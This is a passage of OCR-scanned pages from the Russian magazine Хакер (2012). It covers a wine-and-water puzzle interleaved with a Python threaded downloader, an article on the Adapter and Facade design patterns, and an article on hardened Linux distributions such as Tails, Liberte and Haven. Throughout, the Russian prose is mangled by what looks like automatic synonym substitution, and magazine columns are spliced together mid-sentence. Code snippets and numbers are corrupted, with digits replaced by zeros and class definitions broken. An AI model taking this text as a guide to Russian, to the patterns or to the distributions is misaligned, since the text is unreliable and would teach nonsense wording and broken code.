РЕШЕНИЕ Я малограмотный стал в особицу щеголять равным образом реализовал скрипт из использо на а­

УСЛОВИЕ

нием группировка дартн ой thгeadiпg:

В одной бутылке литр вина, на др угой литр воды. Из первой вот вторую перелили ложку проступок , а спустя время с второстепенный на п ервую перелили ложку

import import import import

получившейся смеси. Чего тепер ь больше: воды на бутылке не без; вином

sys threading Queue urllib2

иначе инструмент во бутылке вместе с водой? Вино равным образом вод у далеко не перемешивали.

РЕШЕНИЕ Для большей наглядности возьмем ложку содержащий в себе

#

Класс

потока,

скачивающий

страницу

class DownloadThread(threading . Thread): def run(self): #

Прописываем хидеры на

headers

=

I

=

000

мл

корень зла

0еее мл воды

+

0ее мл источник

I

бутылка:

000

II

бутылка:

0еее мл воды

мл

провинность

+ 0ее мл смеси + 0ее мл источник -

0еемл смеси

страницы

urllib2.Request(urlsPool .get(),None,headers)

Пишем на обособленный обложка

Выдаем справку,

После второго переливания:

б.е)' }

logfile.write(urllib2.urlopen(req).read()) logfile . close() #

П о­

{ 'User-Agent' :

Запрашиваем предмет

req #

бутылка:

п бутылка:

запроса

'Мozilla /4 . 0 (compatiЫe; МSIE 0.0; Windows NT while urlsPool.qsize() > е : logfile=open(str(urlsPool.qsize()), ' w' )

#

000 мл.

сле первого переливания имеем:

неравно скрипт запущен не принимая во внимание аргументов

П олучается, ч так на смеси 00 частей воды равным образом 0 порцион первопричина сиречь же 100/11 мл корень зла да 0000/11 мл воды . С учетом сего перепишем послед­

нее представление !позволю себя убрат ь «МЛ» ради большей компак т­ ности ]:

I

бутылка:

if len(sys.argv) < 0: print 'Usage : downloader.py [-n <number >] FILE \ n\ "- n <number>" - number of threads (default 00)' sys.exit( 0)

п бутылка:

I

бутылка:

#

II

бутылка:

Обрабатываем мыслимый энтимема не без;

числом nотоков

if len(sys.argv)==4 and sys.argv[ 0] threads int(sys.argv[ 0]) else : threads 10

==

(9ее (1еее

+ 000/ 01) инструмент + 0000/ 01 воды - 0000/ 01) воды+ (1ее - 00/ 01)

причина

П осчитаем дроби:

009,09 909,09

преступление

корень зла

+ 00,91 + 00,91

воды

воды

'-n ' : Как видно, смешение во бу страна ках оди н ако вая ! Но зто позволено бы ло понять да несравненно элементарнее : подумай, опять-таки диапазон жи д кос т равным образом на бу территория ках в итоге остался одинаковым - в рассуждении дин литр, а значит, равным образом самочки смеси

должны оказываться одинаковыми. ::Х:

ХАКЕР

03 /158/ 0012

099


КОДИНГ

МЕНЯЕМ

ИНТЕРФЕЙСЫ КЛАССОВ БЕЗ УЩЕРБА ДЛЯ ЗДОРОВЬЯ

deeonis [deeonislagmail.com[ ·

а во ай представ им, ч т по части сколько-нибудь планирование отступать ты да я написали

известный парсер, что собирает опре д е л е нн ую инфор­ мацию не без; нужных сайтов. Дляп арсинга НТМL- стра н да ц мы использовали стороннюю библиотеку, ко ведь раиса позднее в отношении тл ично справлялась со своими задачами. Но вот т п рошло некоторое время, и вместе с т арый заказчик, про которого наша сестра соз д разве н а ш чуд в отношении -п ро д укт, ре ­

шил напомни т ь по отношению себя равным образом по мнению п росил перед бавить парочку-другую н касательно вам х функций . Мы со задором взялись вслед за работу, так точь в точь разом по­ няли, что-нибудь помещение интересах разбора НТ М L- ко д а уж д ав же усишко т аре л а и никак не поддерживается. Зато на открытом доступе принимать своего рода от кучей свистелок равным образом блестяшек, тот или другой ко тому а работает быстрее равно со т а­ бильнее. Н относительно кушать одна проблема- ан т ерфейсы у классо во нов ой

Разработка равным образом подпора большинства систем

библиотеки п ол н остью отличаю т ся через тех, которые м ы использо­ вали ранее. Более того, другие методы вместе с та рого НТМL-дв ижка

повелось во школа многих лет. Кодовая склад

никак не имеют анало г ов на новом. Нет, содеять ч т в отношении -т что до п одобное можно,

растет в духе в дрожжах, а взаимосвязи средь

побить окончание их работы. Всё сие для во по части дит возьми мысль, ч т в рассуждении

компонентами программнога обеспечения

присчитать мгла у новы х фич если т малограмотный та ко п росто, по образу для м сие показа­

становятся всё сложнее да изощреннее. Зачастую при обновлении отдельных участков стих до

программистами встает предмет внимания рефакторинга всего проекта от альфы до омеги . Для того так чтобы этого избежать, создан паттерн « Адаптер», об котором мы ноне да поговорим .

000

так про сего н ужно призвать небольшую толику функций да чисто

рогач вначале. Однако, беспричинно наравне да мы вместе с тобой п роек т ирова ли наше прил ожение в 00 -стиле, нам получи и распишись пособие придет паттерн <<Ада пт ер», ко т орый избавит нас через переписывания кучи старого заключение .

ПАТТЕРН «АДАПТЕР» Чтобы постигнуть , что работает свой благодетель ный паттерн, до­

статочно увидеть какой- н ибуд ь п ерехо бытие к, например, для элек т ро пр иборов изо С Ш А, какой п холм во относительно ля е т прогнать самочерного меж белоножкиным ш татовскую вилку на е вр опейскую розетку . Пр ограммный звукосниматель д е ла ет при-

ХАКЕР

03/158/2012


Паттерны «Адаптер>> да «Фасад>>

мерно так но . А коли конкретнее, ведь дьявол преобразует одиночный интерфейс

puЬlic

IHTMLParser

вызова на непохожий . Единственная его мишень - учинить так, чтобы клиент безвыгодный заметил, что такое? некто обращается абсолютно для дру г ой библиоте­ ке, равным образом тем самым избежать трудоемкой равно на какой-то степени пусть даже

private : ModernHTMLParser &m_modernParser;

опасной процедуры изменения кода.

puЫic :

Д ля основные положения нуте взглянем для то, что-то у н дока было раньше.

HTMLAdapter(Modern HTMLParser &parser) { m_modernParser=parser;

Наша програ~а во первой версии (используется устаревшая библиоте ко а с целью парсинга

0/

HTML)

}

Интерфейс парсера

char * get Tags() {

01 . ..

class IHTMLParser

m_modern Parser.getHtmlTags();

{

01 . .•

01 char * getтags ()

};

е·

'

01 ...

/1

}

/1

Класс,

р еализующий

class HTMLP arse r :

равно нт ерфейс

puЫic

/ / Кл ие нт ский код ModernHTMLParser &modernParser=new ModernHTM LParser(); I HTMLParser * parser=new HTMLAdapter(modernP arser); parser->getTags();

IHTMLP arser

01 char * getTags() // Р еализация

метояа

Клиентский адрес неграмотный претерпит прагматично никаких изменений.

};

Н у, неужели почто придется образовать предмет класса HT M L Adapteг равно пере­

01 } // Клиентский код IHTMLParser *parser parser->getTags();

предоставить ему на качестве параметра ссылку бери Моdегп НТ МL Р агsег. Используя композицию,тоестьпередаваяобъектадаптируемого класса соответственно ссылке, да мы вместе с тобой повышаем общую покладистость системы .

new HTM LParser();

В общем случае адрес адаптера может видоизменить результа­ ты, получаемые ото адаnтируемого класса. Так, если, например, ме­

Как пишущий сии строки видим, тута всё баста просто. Е сть кое-какой разряд

тод getТagsll класса НТМ L Рагsег возвращает скопление НТ М L-тегов,

Н Т МL Р агsег, реал равным образом зующий соответст во ующий интерфейс. Клиент­

используемых во разметке страницы, а ме т од get Htm iTagsl l класса

ский адрес создает объек т, ко т орый поддерживает э т по отношению т ан т ерфейс,

ModeгnHTMLPaгseг возвращаеттоже самое, а на виде вектора, в таком случае

а по времени обращается для его разнообразным методам. Но сегодня

действие метода getТags во HTM L Adapteг создаст конгломерат получай осно­

у нас питаться ModeгnHTMLPaгseг, какой хоть твоя милость в чем дело? хочешь неграмотный поддерживает

ве полученного с новой библиотеки вектора.

IHTM L Paгseг. Д ля того дай тебе отремонтировать нынешний недочет, наша сестра создадим класс, некоторый хорошенького понемножку помогать IHTMLPaгseг, рядом этом деле г и­

Изменение результатов работы адаптируемого класса

руя устройство его методов н овой библиотеке . Этот свежий жанр

class HTMLAdapter (Moder nHTMLP ar ser &parser): puЫic I HTMLParser

истанет а д а п тером.

Адаптер к

ModernHTMLParser class ModernHTML Parser

private : ModernHTMLParser &m_modern Parser; puЫic :

HTMLAdapter(ModernHTMLP arser &parser) { m_moder nP arser=parser;

01 std ::vect or <char *> getHtmlT ag s ();

01 . . .

char *

01

Адаптер,

р еализующий

I HTMLPa r ser class HTMLAaa pt er (Mode rnHTMLP arser &pa rs er):

CLIENT

getтags ()

0/ .. .

да нтерфейс

vectorOfTa gs

m_modern Parser.getHt mlTags();

TARGET

0

+request!l

r_

0

Adaptee -> specificReqest []

0

ADAPTER

0

+request(]

0------

-

«ad aptee»

.. ADAPTEE

specificReqest 01

Д да аграмма классов nаттерна « Адаnтер »

ХАКЕР

03/158/ 0012

001


КОДИНГ

// Преобразуем градиент во массив return vector2array(vectorOfTags);

char * getTags() { // Тут всё проще, где-то в качестве кого автор наследуем методика getНtmlTags (),

};

/1

IJ

vectorOfTags=getHtmlTags();

Jl

так не грех поднять его наnрямую

Преобразуем ве ко тор во конгломерат

return vector2array(vectorOfTags);

};

Е сли твоя милость точный заглядыв аеш ь во рубрику << Кодинг », то, на­

верное, помнишь др угой аналогичный паттер н, а не кто иной « Де коратор>>.

Jl ...

На стержневой мнение поистине может показаться, почто в соответствии с сути эти двоечка шаблона объектно - ориентированного пр ограммирования Конечно, используя юниорат взамен композиции, да мы вместе с тобой теря­

идентичны. Но получи и распишись самом дел е паттерн «А даптер >> служит для того пре­

образования одного ан т ерфейса вызова на другой, на ведь минута равно как

ем некотор ую пластика равно ограничиваем себя чуть одним классом

« Декоратор >> призван мо ди фицировать результаты, выдаваемые

НТМLРагsег, так обмен получаем увеличение во производительности .

методами поддерживаемых классов.

Если бы расписание создавала мн ожес тво объек т ов HTML Adapteг и сочно работала из его методами, то, используя трансформатор объ­

АДАПТЕРЫ КЛАССОВ И ОБЪЕКТОВ

ектов, автор сих строк бы тратили лишнюю эйдетизм да теряли эпоха быть вызове

Выше пишущий сии строки рассмотрели приблизительно называемый а дап тер объектов, ко т орый

его методов равным образом сохранении инкапсулированного НТМLРа гsег. С др у­

ада пти рует интерфейс п у т ем композиции соответствующего объ­

нееврей сто роны, когда бы у бери вместе с бы л н екий комната НТМLРагsег 0, тот или иной

екта равным образом передачи ему н стрела-змея ны х вызовов. Н по части принимать до сей времени сам внешность такого

бы и реализовывал интерфейс IH TMLPa гseг, нам пришлось бы

паттерна-это а даптер ко ла ссов. В звезда через а дапт забияка объектов,

nисать пользу кого него новоявленный код.

преобразователь классов испол ь зует множественное наследова н ие, сколько

одну крошку у прощает его реализацию равным образом уско ряет работу.

« ФАСАД » Теперь , когда-когда автор ладно разобрались во паттерне «А даптер >>, можно предпринимать другим маска ом объектно-ориентированного

Адаnтер классов

class HTMLAdapter (): puЫic HTMLParser,

программирования подо названием «Фаса д >>. Технически « Фасад >> puЬlic

ModernHTMLParser

недовольно нежели отличается с «А даптера >> . Чтобы на этом убедиться, давай взглянем бери код.

puЫic : Паттерн

using

Syз~em ;

namespace

«Фасад>>

class SystemClassl { void methodA() ;

Adap~e~

01 .. .

{

} class MainApp class SystemClass2

static void Main () (

void methodB();

01 Create adapter and place а request Target ~arget=new Adapter () ; target .Request (); 11 Wнt for user Console . Read ();

01 . ..

class

SystemClassЗ

{ void methodC ();

/J . ..

01 "Tarqet" class Target

class Facade (SystemClassl &scl, SystemClass2 &sc2, SystemClassЗ &sсЗ)

( puЬlic

virtual void Request ()

( Console . 0Jп.teLine ( "Called

Target

Requeзt()") ;

01 "lldapter"

private : SystemClassl &m_scl; SystemClass2 &m_sc2; SystemClassЗ &m_scЗ;

class Adapter : Target puЬlic :

(

private Adaptee adaptee=new Adaptee (); puЬlic

override void Request ( )

Facade(SystemClassl &scl , SystemClass2 &sc2, SystemClassЗ

(

01 PossiЫy do sоме othm· м:~rk 11 and then call Spec~f~cRequest adaptee . SpecificRequest ( );

01 "Addptee"

m_s cl m_sc2

scl; sc2;

m_ scз

sсЗ;

&sсЗ)

void method()

{ Пример стих nаттерна « Адаnтер» бери С#

002

m_scl. methodA ();

ХАКЕР

03/158/2012


П а тт ер н ы <<А д а пт е р » равным образом << Ф аса д »

All the complexity of this entire sub-system is encapsulated in а single wrapper class and it's simple interface ------------------т------------------

SubsystemOne SubsystemTwoWгappeг

+primeTheDirectivell

SubsystemThгee

/

Holodeck

PlasmaConduit

WагрСоге

JeffeгiesTube

0 DilithiumChambeг

Weapon

t Тгаnsрогtег

TuгboLift

PhaseгBack

PhotonToгpedo

Диаграмма классов паттерна ссФасад•>

m_sc2 . met hodB() ; m_sc 0. meth odC () ;

стему . <<Фасад>> но инкапсупирует безвыездно сии поведение во одном своем методе, что такое? сво д ит всю процедуру для вызову одной-единственной функции равно тем самым упрощает клиенту проживание . Е сли прово д ить

'

аналогию со П К , ведь <<Фаса д >> - сие кнопочка включения ноу т бука.

}

Более того, п а тт ерн <<Фаса д >> позволяет клиенту обращаться Класс

Fa cade,

где-то но в духе равным образом HT M L A d a p te г, п ринимае т на каче ­

ко любому классу сис т емы сверху п рямую, сверху низком уров н е, благода­

стве движение р аметров своего конструктора ссылки бери объекты. Только,

ря чему сохраняется все уступчивость да мощь сих классо на . О д вдоволь

на различие с <<Адаптера>>, сих ссылок неско ль ко . Д алее <<Фасад>>

ко, буде пациент знает исключительно интерфейс <<Фасада>>, на будущем

определяе т н есколько ме т что касается д относительно во , ко т орые обращаются ко функциям

ты да я можем переменять систему классов, обслуживаемых

инкапсулиро во анных объекто на . Всё просто-напросто равно оче н ь судя по всему для п ат­

Facade,

терн <<А д аптер>> . Н что до ц ели у сих д вух ш абло н ов соверше нн по отношению разные.

полезна.

да быть этом отнюдь не выменивать адрес клиента . Такая обособленность весть

Если НТ М LР а г sе г п р е д назна ч е н в целях п ри на е д е н ия од н ого интерфей­ са для другому, в таком случае

Facade

у п ро щ ает интерфейс доступа ко отнюдь не которой

ЗАКЛЮЧЕНИЕ

системе классов . В быть во еденном больше примере автор сих строк инка псулируем

Мы узнали что касается д вух новых паттернах: <<А д аптере>> да <<Фаса -

махом изрядно объектов, принадлежащих ко разным типам равным образом со­

де>>. Первый позволяет свободно повергнуть равным образом н терфейс

ставляющих незнакомый пакет ко л ассов, который-нибудь служит к выполне ­

одного класса для интерфейсу д руго г об на быстрой адаптации

ния каких-либо опре д е л енных д ейс т вий . Ч тоб ы выгодно отличается себя сие

клиентского стих для новым компоне н тама системы. Ш аблон

п ре д ста во равным образом т ь, д остаточно вс п ом н ить ста р ый д обрый П К от систем­

00- п ро г рамми р ования <<Фаса д >>, куда п охожий н а <<А д а п тер>>,

ным блоком, монитором, танец н ками равным образом прочей периферией. Дл моя персона

служит пользу кого абсолютно видоизмененный цели - у п ро щ ения д оступа

запуска сего компьютера нам нуж н об нажат ь кнопку питания в си­

ко определенным интерфейсам.

стемном блоке, включит ь монитор, колонки да т. д., в таком случае лакомиться поднять

пропасть функций классов, которые совокупно образуют некую си-

ХАКЕР

03/158/2012

В мире объектного кодингасуществует снова мно г по отношению разнообраз ­ ных паттернов, по отношению которых моя персона расскажу на будущем. :х:

003


UNIXOID

Евгеня Зобнин [ e xe cЬit. r u l

изоляцию ИЗ ЧЕГО СОСТОЯТ БЕЗОПАСНЫЕ LINUХ­ ДИСТРИБУТИВЫ Когда спич заходит в отношении создании операционки, способной заручиться неизвестность пребывания

-

Разработчики безопасных дис т рибутивов избегают использовать

ТгuеСгур t, этак вроде

его разработка ведется получи и распишись ба з е за ко рытой модели, из-за ась? проложить

энциклопедический аудит кода не объединение плечу .

Во пора каждой

на Сети, тревога сохраненных держи диске

загрузки Наvеп

данных равным образом навязать накипь деньги

« малолетства •)

проверяет

защиты , дистрибутивастроители оказываются

дистрибутива в дня х, прошедших

не без; момента

получи и распишись изумление плодовитыми получай идеи

установки .

равным образом неординарные решения парнями . Эти м

Разработчики не рекомендуют

пускать в дело

разработкам, простым да сложным , гениальным

дистрибутив,

да спорным, да посвящена данная статья.

ДОСТИГ

годы которого

000 ДНеЙ .

l:iфl!lilillli

д истрибу т равно ваша сестра что касается т на злом щ иков , по отношению д хотя вр еме нн относительно

М н огие хакеры, считаю щ ие себя эксперта-

п холм во относительно л ваш покорный слуга мы сохра н ит ь ванька-встанька обство равным образом п ростоту во ис­

ми на без п асности только да на ся, на свое сезон

п что до л ьзова н ии . Ч тобы никак не после п у та т ь чита т е л я, ваш покорный слуга

брались ради созда н ие п о-нас т оящему защи щ ен ­

разбил э т равным образом т ех н ологии бери отлично групп :

ны х равным образом предлагающи х п олную незнакомец н волос ОС.

заплатки , сообразно умолчанию чистоган что до жен н ые получай кер ­

которые действи т ельно показали шар земной у, для что-то

нел.

способны. Не будем д елать н авевающий тоску

цен т рируемся получи самых гла вн ых т ех н ологиях в их арсенале , ко т орые н а д ежно вслед щ равным образом щ ают сии

равным образом вслед за п ут ы ван да автор этих строк т ех, для т касательно пытает вместе с ваш покорный слуга е го для й ти .

Защита д а н ны х . Описани е вместе с объединение от обов , от п по отношению ­

Д есктоп. Н абор д осту п н ы х п риложений, а в свою очередь методики , п рименяемые с целью защи т ы

Я д ерные д е л а, а точнеепатчии раз в год по обещанию л ичные

Многие с них потер п е л равным образом крах , тем не менее неграмотный ­

укоренившийся осмотр д ист р иб у ти на в рассуждении на , а скон ­

зуе ты да я х дл ваш покорнейший слуга обез лич равным образом во а н равно пишущий эти строки пользов а т е ля

ото пос т оронних наблю д ате л ей .

Различные ан т ересн ы е гадость ш ки. Итак, окунемся на шар земной поле а н ои д а л ьной

мо щь ю которых дости г ает от аз многогрешный безопасност ь

секьюрности равно рассмот р им сле д ую щ ие д ис­

сохра н е н утнапиштим держи д иске /флешке равным образом н фо р ма ц ии .

т рибутивы : Ubuпt u Pг i v acy

Анонимиза ц ия .Н абортехноло г ий,испол ь-

Haven

P гoject,

Tails

Re mi x, Pгi v a tix, The Li nux.

да L ibeгte

ХАКЕР

03/158/20 02


Свобода вследствие изоляцию

ЯДРЕНЫЙ ТУКС

дога приложения получи отдельной виртуальной

Чтобы проделать туке серьёзно безопас­

машине. Смысл такого перегруза заключается

утнапиштим ОСью, никак не быть сверх допиливания ядра,

на тотальном разделении приложений, таково что-то

а точнее, его патчин га с целью повышения общей

хоть буде взломщику каким-то непонятно как удастся

стойкости ОС. Водан изо традиционных методов,

улучшить домашние льготы предварительно суперпользо­

используемых интересах успехи этой цели,

вателя да вслед гр узить во стержень особый код, уязвимым

заключается на наложении возьми косточка патч ей

будеттолько одно приложен да е, эдак равно как каждая

проекта gгsec:uгity. Они обеспечивают защиту

виртуальная орудие работает около управлени­

ото возможных вторжений вместе с через множе­

ем собственного ядра. Такой зубодробитель­

ства методов, посредь которых приказ перехода

ный сноровка защиты используется во дистри­

в области ссылкам, безграмотный принадлежащим пользовате­

бутиве

лю, дозволение чтения

была посвящена отдельная часть !« Младенец

dmesg

с целью всех, кто такой невыгодный име­

ет прав гооt, дополнительные ограничения интересах

QubesOS,

которому во нашем журнале

из на вывеску убийцы>>,

][_07_2010].

сhгооt-приложений, заказ чтения

/ргос, хэширование адресного пространства и стека ядра да многое другое. Мы уж писали

Процесс загрузки

Liberte

НЕДОСЯГАЕМЫЕ БАЙТЫ

касательно gгsecuгity [статья <<Термоя дерный синтез»,

Защищенность личных данных пользовате­

опубликова нн ая во октябрьском номере вслед

ля- сие вторая важная свое лицо лю-

на кто хочешь час позволительно удалить, на результате

брань безопасной ОС. Многие дистрибутивы,

а построение вернется ко исходному послеуста­

предназначенные пользу кого анонимизации юзера

новочному состоянию.

0010

год], приближенно что-то невыгодный буду повторяться. Обычно с вместе с gгsecuгity на систему

данных пользоват е ля отображение растет, да его

устанавливается снова да РаХ, какой ограни­

во Сети, обеспечивают ее не без; через спосо-

чивает ход ко страницам памяти процессов

ба, какой-никакой оператор с известного анекдота

лес инструментов с целью от оздания зашифрован­

!например, делает макросегмент данных недоступ­

назвал бы ампутацией нен у жного органа .

ны х файлов равным образом каталогов . Чаще лишь с целью сего

ным к исполнения], зачем позволяет встать получай защиту

Такие дистрибутивы распространяются во виде

системные процессы с многих ошибок пере­

LiveCD,

который, даже если буду чи установленным

Многие системы в свою очередь включают на себя бери ­

исп относительно льзуется славный инстр у страж порядка ТгuеСгурt с удобным графическим интерфейсом. Напри­

полнения буфера. Этот подступ используется

возьми флешку, сохраняет всегда факты пользова­

мер, возлюбленный входит на Наvеп l www.haven-pгoject . oгg ].

во Libeгte Liпux, кто построен нате основе

теленок получай RАМ-диске , уничтожаемом вот минута

Однако по временам разработчики дистрибутивов

ядра Haгdened

перезагрузки.Спосо~ конечно, действенный,

прибегают ко паче изощренным решени-

а чересчур грубый .

ям. Дистрибутив Pгivatix охватывает во себя

Gentoo, сделано

включающему

на себя и оный и другой патча . Другой подступ заключается на использова­

нии системы

SELinux

или — или АррАгmог объединенно

Более занятный вид состоит вис­ пользовании шифрованного хранилища

инстр у легаш шифрования съемных носителей UsbCгyptFoгmat равно утилиту ради резервного

со двумя упомянутыми прежде патчами !или

получай базе ТгuеСгурt иначе LUKS/dm-cгypt, которое

копирования шифрованных томов CгyptBackup

за них, так сие глупость] . Эти системы

расшифровывается кайфовый миг загрузки позже

собственной разработки. В плане поддержки

принудительного контроля доступа позволя­

ввода пароля. Благодаря современным на­

прозрачного шифрования данных особенно

надстройка бросать приложения во изолированном

работкам продать такую систему весть

окружении, где-то почто накладка !читай взлом] одного

просто, тем паче что-нибудь симпатия на готовом виде

примечателен дистрибутив Ubuntu Pгivacy Remix lwww. pг i vacy-cd . oгg ], ремилитаризованный с целью

изо них безвыгодный повлечет следовать из себя проблем на других.

присутствует во дистрибутивах

работы на локальном окружении, минуя доступа

Подход из использованием АррАгmог реализо­

да многих других . Она тоже переводу нет на дис­

для волокуша lзадействование LAN/WLAN/Biuetooth

ван во операционке

трибутивах

запрещено]. В его арсенале нет переводу фронт-энд

явлениям ее создателей, гарантирует полную

TailsiThe Amnesiac lncognito Live System] равным образом Libeгte Linux, притом на последнем

изоляцию приложений дружок через друга.

на качестве хранилища используется крипто­

руемый вместе с

ванный отображение диска, находящийся на отдель­

зашифровывание , творить подписи равным образом генери­

ном каталоге. По мере календарь на него личных

ровать ключи от через контекстного кадастр

quantOS,

которая, по мнению за­

Еще побольше кардинальный странствование заключается в применении гипервизоров пользу кого запуска каж-

Ubuntu,

Fedoгa

собственной разработки про

Nautilus

GnuPG,

интегри­

да позволяющий совершать

lв Наvеп те но функции выполняет инструментарий

Seahoгse]. Также дистрибутив использует так называемые расширенные ТгuеСгурt-тома

lв собственной терминологии авторов проекта] для сохранения данных, накопленных пользо­

вателем изумительный срок работы !например, настройки приложений, вокабулярий

OpenOffice,

ключи GпuPG

равно т. д.]. Всё сие работает открытым текстом равно никак не требует каких-либо дополнительных действий со сто­ роны пользователя.

Кроме систем шифрования, дистрибути­

вам могут охватывать во себя вспомогательные инструменты, которые помогают укрывать

равным образом пригреть кого информацию через посторонних. На­

пример, во настройка приложений Tails входит ин­ струмент МАТ l mat.boum . oгg ], тот или иной удаляет метаданные иэ файлов различных форматов

!изображений, документов равно т. д.], с целью того чтобы запрятать иэ них все замечание об ав­

_

Remov.able media can Ье disco м ected now. Before dtsconnecting. make sure that any 0/0 activity on the device has stopped.

торе.

Haven

имеет покамест побольше интересные воз­

можности, например, некто позволяет шифровать содержимое яички обмена на сам клик, что можно воспользоваться чтобы быстрой передачи

Liberte Linux собственной nереоной

ХАКЕР

03/158/ 0012

малого объема данных [скопировал строку-

005


UNIXOID

Congratulations. Your browser is configured to use Tor. Pluse ntlar to the ~ COf" l'urther inform.~tion aЬout using anonymously.

Тог safaly.

You &re now

fnМ

to Ьrowse the ln temet

.....

-·-;",..-;.., _.,. _ _ ••••a.u.m.11

__ . ~

....

liiiЬ

...

::".:'~:.:"..:·~:" ~

-.II~~.....W...-..L!Iai..МU....J.J.iU8~~~11111.1W.

floiSI8ofll~llllrllo~ Doo .IIOitiaweWмe

0 ttrrl!w ' w--~

Рабочий кассореал Haven 05

The Amnesiac lncognito Live System

нажал получи ударение во трее- вставил на письмо).

механизмы да может хватить его на случае сбоя не так — не то

плане

Менеджер файлов

объединение недосмотру разработчиков приложения.

всё, сколько всего лишь дозволено вообразить , в такой мере в качестве кого их

Nautilus,

укладывающийся во оный

а дистрибутив, оснащен плагином , кой

П оэтому на Libeгte

Linu x применяется

остальной

Ta ils,

во каковой разработчики пихают

далеко не смущает важный величина дистрибутива. На­

предназначен про << полного >> удаления файла

подход: целое входящие во дистриб утив сетевые

пример, во него входит графичный фронт-энд

чрез контекстное меню. Перед удалением

приложения настраиваются возьми работу путем Тог

с целью Тог-клиента

обложка забивается случайными данными, таково который

lприложения, н е умеющие коптеть со прок-

Vidalia lwww.toгpгoject . oгg/ pгojects/vidalia l, некоторый позволяет запускать/

ни единовластно приспособление восстановления данных

си, запускаются из через обертки toгify), а

ослаблять Тог-демон, просматривать

неграмотный сможет его найти.

стена запрещает любые исходящие сое ­

состав прошедшего посредством Тог трафика,

динения. Та кая диаграмма позволяет избежа ть на правах

мо н иторить средства д емо получай да т. д.

АНОНИМУСЫ ИДУТ

прибыль IР-адре са, т ак да установления внешних

Дистрибутив охватывает во из ебя три расши­

Обеспечение анонимности пребыв ания

соединений во огибание Тог. Пр равным образом этом разрешены

рения к браузера Fiгe fox, обеспечиваю суп е

во интернете-третья важная исключение

лишь только вместе с л е д ую щишки е типы внешних соединений:

тревога веб-серфинга: распространение

безопасного дистрибутива. Как равно во случае

DНСР-запросы равно Тог-соединения судален ­

со защитой данных, кой-какие дистрибутивы

ными НТТР IS)-портами;

в веб-странице оживленный контент что-то

подходят для решению сего вопроса радикаль­

ответы получай piпg около ограничении их количе ­

JavaScгipt-кoдa,

но. Например, Ubuпtu Pг ivacy

ства на секунду;

FiгeGPG l getfiгegpg.oгg ), позволяющий при­

безграмотный позволяет сходить на Сеть , на книга числе

созда нны е пользователем VРN-соедине н ия;

модифицировать gрg-операции для любым элеме нт ам

через

соедине ния , инициированныеспециаль­

веб-страницы, примем , подписывать иначе

ным <<небезопасным браузером», какой

зашифровывать специализированный часть текста;

удалена изо ядра Liпu x, чт относительно позволяет пре­

используется в целях регистрации на точках

растягивание НТТР S Eveгywheгe lwww. eff.oгg/

вратить кусок пьютер во эдакий бастион, который-нибудь

доступа.

Bluetooth

Remix

заключая

равным образом аж И К-модуля.

Поддержка общей сложности сего хозяйства умышленно

toгbuttoп, ко т орое блокирует содержащийся

Flash

да т. д .; орган

позволяется эксплуатировать на спокойной работы с важными секре тными данными .

Др угое дело- дистри бутивы, во которых из­

П ере дава емые согласно

DHCP сведения

присутствие этом

усиленно урезаются, а перемещение имени хоста,

равно

0Pv4LL блокируется.

Ч тобы обеспечит ь

первоначально предусмотрена на озможность выхода

ARP

во Сеть . В них анонимност ь обеспечивается

секретность работы во локальных равно

Wi-Fi-

со через во всем известного инструмента Тог,

ceтяx, применяются рандомизаторы МАе­

некоторый пробрасывает конкатенация вследствие

адресов. В некоторых дистрибутивах они

куча сетевых узло во , приближенно что-то его и концы в воду

дост у пны во виде опции, всё же на Lib eгte Liпux

оказываются здорово спрятаны. В обычной

М АС-адрес генерируется подвижно изумительный

ситуации Тог прикидывается стандартным

срок загрузки.

WINDOWS При установке держи флешку дистрибутив

прокси, возьми работу со которым долженствует нас тро ить браузер равным образом др угое ПО . Н в рассуждении по образу составлять на ситуа-

ОБМАНКА ДЛЯ ~ ПОЛЬЗОБАТЕЛЕИ

Наvеnnроделываетодининтересныйтрюк

СУРОВОЕ ЛИЦО

из таблицей разделов, по причине которому

ции, при случае помощью Тог необ хо димо пробросить

Е сли баять что до поль зовательском интерфейсе

ординарный абонент

вполне вс е сое динения , этак чтоб ни касательно дн об

ди ст ри бутивов для того анонимусов, так з десь всегда

встретить систему бери брелке. Дистрибутив создает

изо них н е утек л насчёт во Сеть обходным путем?

весть пр озаично: из тандартны е сре ды Gпome,

доnолнительный nустой раздел размером

Д истрибутивы

Ta ils

да На vеп решают эту

проблему весть просто: брандмауер пере­

LXD E не так — не то Fluxbox,

подборка стандартных прило­

жений словно Fiгefox,

claws-mail,

AЬiwoгd равным образом т. д.,

000

Windows

неграмотный сможет ажно

Мб во начале адресного nространства,

а саму ОС равно пользовательское окно

направляет по сию пору соединения держи Тог-прокси,

да плебейский ассортимент ПО чтобы ведения

размещает во следующих разделах .

не считая любые прибыль траф ика во отвод

скрытой деятельности . Он-то нас равным образом интересует.

<< невыгодный видип> другие разделы, nозтому

<<анонимной сети». Однако формирователь Libeгte

Н екоторые стандартные приложения интересах

Windows

nользователю nокажется, в чем дело? держи флешке

Liпu x предупреждает, ч т об ёбаный упрощенчество тео­

безопасного времяпрепровождения наш брат ранее

ни ложки нет, а ее количество составляет

ретически небезопасен, где-то вроде , инициируя

рассмотрели на предыдущих разделах, по отношению дн ако

nущей убедительности на нынешний раздел позволено

сочленение традиционным п у т ем, прибавление

получай них меню интересных софтин, очевидно же,

набросать разных документов, а про отвлечения

получает информацию об внешн ем IР-адресе

отнюдь не заканчивается . Особенно любпытен на э т ом

внимания- nорнографических картинок.

006

000

ХАКЕР

Мб . Для

03/158/2012


Свобода вследствие изоляцию

https-eveгywhe гe l, принудительна переклю­ чающее браузер получи и распишись оборот протокола

Eile f.dit ~ew .Q.o jlookmarks Jools Y[indow J:!elp Г'

НТТРS, разве сайт его поддерживает.

Те но расширения идут во комплекте не без; дис­

NewTab

Back

трибутивом Наvеп, при всем том его оружейня ими не ограничивается. Здесь твоя милость найдешь бонус в виде пяти дополнительных полезных рас­

ширений: RefCoпtгol- производит спуфинг НТТР­ поля НТТР-геfеггег, скрывая отсайтов их

доноры, в таком случае принимать сайты, не без; которых произошел

Congratulations. You are using Tor.

переход.

CookieSafe- позволяет заправлять уста­ новкой кукисов на браузер интересах выбранных

Please refer to the Тог webs~e for

сайтов .

AdBiock Рlus-блокируетрекламу. RequestPolicy- позволяет открывать меж­

сайтовые требования равным образом править ими [защита от CSRF-aтaкl. Peгspectives- позволяет проверять подлинность самоподписанных

SSL-

сертификатов.

Libeгte: Тог равным образом нуль выключая

Некоторые дистрибутивы равным образом включают на себя славный орган Аiгсгасk-пg

расположение точки получай экране. Все приложения

про исследования Wi-Fi-ceтeй да генераторы

собраны со использованием инструментария

паролей, устойчивых ко подбору [например,

